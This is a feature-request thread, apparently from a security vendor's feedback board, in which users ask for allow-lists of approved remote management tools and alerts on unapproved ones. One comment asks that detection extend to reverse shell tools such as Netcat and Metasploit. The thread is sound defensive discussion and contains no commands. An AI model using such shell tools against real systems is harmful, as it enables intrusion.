Create Known Good RMM Profiles
J
Jonathan Belle
It’s a simple App Blocker feature or whitelist/blacklist option similar to what BlackPoint offers. Only allow the authorized RMMs and block all others. If this needs to be an additional tool, that’s fine—but the EDR should at least have an option that says “Block All Other RMMs.”
Another option would be to create an application baseline during initial onboarding that requires the customer to confirm the RMM tools detected on the endpoints. That way, the approved RMM is known from the start, and the detection process won’t be delayed when something outside the baseline appears
T
Tim Sword
Adding comments per partner correspondence:
"with any other rmm tool, its like having another administrator onboard. they can do anythign.
im concerned about the file transfer aspect of it. they had access for months. they couldve been uglier and uninstalled our rmm and huntress and we wouldve never known.
so i think a notification of another rmm would a minimum"
T
Tim Sword
Adding comments per partner correspondance:
"I've been saying for a while we need a way to allow list one domain for screen connect and preemptively ban all others. But there has never been a way to do that. "
U
Ugnius Radzevicius
This feature is critically important for maintaining security visibility.
Currently, users can download and execute Remote Monitoring and Management (RMM) and Remote Desktop Protocol (RDP) applications from the public internet with zero visibility, regardless of whether they run with standard or administrative privileges.
As a Security Operations Center (SOC) monitoring tool, implementing detection for these unauthorized applications is crucial. This feature must:
Alert on designated channels when an untrusted RDP or RMM application is launched or attempts a connection.
Be configurable to allow specific, trusted RDP/RMM tools (similar to how trusted locations and VPN providers are handled).
Extend detection to include common reverse shell tools and frameworks, such as Netcat and the Metasploit Framework, when they initiate outbound connections or set up listeners.
Visibility into and control over the usage of remote access tools represents a vital monitoring aspect and is a fundamental requirement for effective security posture management.
Matthiew Morin (Huntress)
Merged in a post:
Provide functionality for customers to list expected RMMs in their environment.
M
Mark OHalloran
I believe having a feature that can help an analyst quickly determine if a RMM is expected is if customers are able to provide a RMM whitelist. I was thinking that this functionality would be similar to the "expected VPNS/countries" in ITDR.
This would help the SOC scope on potential compromises by rapidly being able to identify known good RMM usage and can provide a threat hunting opportunity by hunting for RMMs not on the allow list.
M
Matt Wilson
+1 here. We use NinjaOne RMM + SentinelOne Complete & have ScreenConnect. Attacker used Atera Agent + outdated ScreenConnect calling home to a Netherlands IP. Went undetected for far too long, unfortunately, so no EDR nor WinEvent data to review leading up to and following the breach. :-/
Matthiew Morin (Huntress)
Merged in a post:
Known Good RMM Instances
R
Ryan Sipes
It would be helpful to be able to add known RMMs in an organization so that the Huntress team has more insight into anomalous RMM installs in co-managed environments. For example, we have a software team that installs CWC/SC across some of our client environments. Being able to add those instances to a whitelist would allow Huntress to know that those CWC/other RMM installs are allowed but any other instances should potentially be investigated/looked at more closely
S
Shawn Weisz
This is a great idea.
J
Joe Miller
FWIW, I have had Huntress catch known, rogue ScreenConnect instances.
J
Joel DeTeves
Yes please, RMM's are used by threat actors all the time. We also encounter scenarios where we have to weed through all the RMMs left behind by the old MSPs who often don't remove them cleanly when handing over a client!
Load More
→